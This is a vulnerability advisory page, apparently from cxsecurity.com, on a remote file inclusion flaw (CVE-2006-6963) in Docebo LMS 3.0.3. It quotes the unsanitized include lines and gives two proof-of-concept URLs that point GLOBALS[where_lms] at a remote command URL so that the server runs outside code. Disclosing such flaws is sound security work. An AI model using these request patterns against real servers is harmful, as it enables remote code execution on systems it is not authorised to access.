Bug: Docebo Lms 3.0.3, Remote command execution ( Ascii Version )

Search:
WLB2

Docebo Lms 3.0.3, Remote command execution

Published
Credit
Risk
2007.01.30
Federico Fazzi
High
CWE
CVE
Local
Remote
N/A
CVE-2006-6963
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

-----------------------------------------------------
Advisory id: FSA:010

Author: Federico Fazzi
Date: 09/06/2006, 7:24
Sinthesis: Docebo Lms 3.0.3, Remote command execution
Type: high
Product: http://www.docebolms.org/
Patch: unavailable
-----------------------------------------------------

1) Description:

Error occured in class.definition.php,

include($GLOBALS['where_lms'].'/modules/'.$this->module_name.'/'.$this->module_name.'.php');

Error occured in scorm_utils.php,

include_once( $GLOBALS['where_lms'] . '/config.php' );

The users can include a remote file because
the $GLOBALS['where_lms'] isn't sanitized

2) Proof of concept:

http://example/[dc_path]/class.module/class.definition.php?GLOBALS[where_lms]=[cmd_url]
http://example/[dc_path]/modules/scorm/scorm_utils.php?GLOBALS[where_lms]=[cmd_url]

3) Solution:

include file where are declare $GLOBALS[*]

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version